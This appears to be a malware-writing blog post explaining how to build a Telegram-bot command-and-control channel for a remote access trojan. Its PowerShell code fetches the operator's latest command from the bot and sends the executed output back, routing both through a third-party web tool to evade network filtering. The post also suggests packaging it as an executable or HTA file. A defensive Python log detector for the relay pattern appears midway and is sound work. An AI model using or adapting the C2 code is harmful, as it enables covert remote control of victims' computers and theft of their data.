Disclaimer: This article is for educational and research purposes only. Do not use the information herein for illegal activities. The author is not responsible for any misuse.
Contents:
- What is meant by Telegram Panel?
- Getting Commands from Telegram Bot (Bypass Filtering)
- Sending Output to Telegram Bot (Bypass Filtering)
- Output
- Summary
- What is meant by Telegram Panel?
You may have heard of a RAT that is connected to a Telegram bot.
This means Telegram acts as a proxy: it sits between the malware and the operator's panel, and the Telegram bot is the channel used for this technique.
For example, we send the ls command to the Telegram bot; the malware makes a request, takes the last message we sent, executes it, and sends the output back to the Telegram bot, where we see the result.
If you don't know how to create a Telegram bot, search on Google.
- Getting Commands from Telegram Bot (Bypass Filtering)
To get the latest message from the Telegram bot, we use the following PowerShell code, which is explained below.
```powershell
# $token and $chat_id are expected to be set earlier in the script.
$url = "https://api.telegram.org/bot" + $token + "/getUpdates?chat_id=" + $chat_id
# Form fields the httpdebugger page expects; that page fetches $url on the script's behalf.
$param = @{
    UrlBox       = $url
    AgentList    = "Google Chrome"
    VersionsList = "HTTP/1.1"
    MethodList   = "GET"
}
try {
    $response = Invoke-RestMethod -Uri "https://www.httpdebugger.com/Tools/ViewHttpHeaders.aspx" -Method Post -Body $param -TimeoutSec 5
}
catch {}
# Pull the text of messages from our chat out of the returned page.
$regex = '"from":\{"id":' + $chat_id + '.*?"text":"([^"]+)"'
$ma4ch = [regex]::Matches($response, $regex)
if ($ma4ch.Count -gt 0) {
    # The last match is the most recent message, i.e. the command to run.
    $global:command = $ma4ch[$ma4ch.Count - 1].Groups[1].Value
}
```
- The $url variable holds the Telegram Bot API address, built from the bot token and chat ID.
- To bypass filtering, the request does not go to Telegram directly; $param holds the form fields the httpdebugger site expects (the author calls them headers), and that site fetches $url.
- try / catch are for error handling: the code inside the try block runs first, and if it throws, the code inside the catch block runs.
- Invoke-RestMethod sends the HTTP request; the Telegram API is reached through the httpdebugger site rather than contacted directly.
- -Uri sets the address; here it is the address of the httpdebugger site, to bypass filtering.
- -Method sets the HTTP method for the request, here POST.
- -Body sets the request body, i.e. the fields in $param.
- -TimeoutSec 5 sets how long to wait for the server to respond.
- $regex holds our pattern.
- $ma4ch holds the matches found by the pattern.
- $global:command takes the last match, which is our command.
- Sending Output to Telegram Bot (Bypass Filtering)
Using the following code, the malware sends the output to the Telegram bot.
```powershell
# Retry until the message is delivered; $text holds the output to send.
while ($true) {
    $url = "https://api.telegram.org/bot" + $token + "/sendmessage?chat_id=" + $chat_id + "&text=" + $text
    $param = @{
        UrlBox       = $url
        AgentList    = "Google Chrome"
        VersionsList = "HTTP/1.1"
        MethodList   = "GET"
    }
    try {
        Invoke-RestMethod -Uri "https://www.httpdebugger.com/Tools/ViewHttpHeaders.aspx" -Method Post -Body $param -TimeoutSec 5
        break      # delivered, leave the loop
    }
    catch {
        continue   # request failed, try again
    }
}
```
- The $text variable holds the output that we send to the Telegram bot.
- break exits the loop once the request succeeds.
- continue returns to the beginning of the loop if the request fails.
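From the defender's side, both code sections above (the command fetch and the output upload) leave the same trace in web proxy logs: a POST to a third-party site whose form body carries a complete api.telegram.org/bot<token>/... URL. The Python script below is an added example, not code from the post, that detects that relay pattern over constructed sample log lines; the key=value log format, the source addresses and the bot token are assumptions.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed proxy-log lines in a simplified key=value form (not real traffic).
# The body is the URL-encoded form that a hashtable passed to -Body produces.
SAMPLE_LOGS = [
    "src=10.0.0.5 host=www.httpdebugger.com method=POST path=/Tools/ViewHttpHeaders.aspx "
    "body=UrlBox=https%3A%2F%2Fapi.telegram.org%2Fbot123456789%3AAAExampleTokenNotReal_xyz"
    "%2FgetUpdates%3Fchat_id%3D42&AgentList=Google+Chrome&VersionsList=HTTP%2F1.1&MethodList=GET",
    "src=10.0.0.5 host=www.httpdebugger.com method=POST path=/Tools/ViewHttpHeaders.aspx "
    "body=UrlBox=https%3A%2F%2Fapi.telegram.org%2Fbot123456789%3AAAExampleTokenNotReal_xyz"
    "%2Fsendmessage%3Fchat_id%3D42%26text%3Doutput&AgentList=Google+Chrome&MethodList=GET",
    "src=10.0.0.7 host=www.httpdebugger.com method=POST path=/Tools/ViewHttpHeaders.aspx "
    "body=UrlBox=https%3A%2F%2Fexample.com%2F&AgentList=curl&MethodList=GET",
    "src=10.0.0.9 host=www.example.org method=GET path=/index.html body=",
]

LINE_RE = re.compile(r"src=(\S+) host=(\S+) method=(\S+) path=(\S+) body=(\S*)")
BOT_RE = re.compile(r"/bot(\d+):([A-Za-z0-9_-]+)/(\w+)")


def inspect_line(line):
    """Return a finding when a POST to a third-party site carries a Bot API URL in its form body."""
    m = LINE_RE.match(line)
    if not m:
        return None
    src, host, method, path, body = m.groups()
    if method.upper() != "POST" or host.lower() == "api.telegram.org":
        return None  # direct Bot API traffic is covered by a simpler host-based rule
    for field, values in parse_qs(body).items():
        for value in values:
            url = urlparse(value)
            if url.hostname and url.hostname.lower() == "api.telegram.org":
                bot = BOT_RE.search(url.path)
                return {
                    "src": src,
                    "relay": host + path,   # the site doing the fetching
                    "field": field,         # form field that carried the URL
                    "bot_id": bot.group(1) if bot else None,  # numeric id only; secret part not logged
                    "api_method": bot.group(3).lower() if bot else None,
                }
    return None


def scan(lines):
    """Run inspect_line over every log line and keep the findings."""
    return [f for f in map(inspect_line, lines) if f]
```

The rule keys on the tunneled URL rather than on one relay host, so it also covers other "fetch this URL for me" web tools; blocking or alerting on such sites for non-browser user agents is the matching mitigation.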
- Output
You can combine this code with Python and run it as an executable file, or you can use HTA files; it depends on your creativity.
- Summary
I hope you enjoyed this post.
Be sure to read our previous articles about creating malware and... and don't forget to support me. If the support is high, I will write more advanced and better articles.
If you have any questions, you can contact me on Telegram with this ID.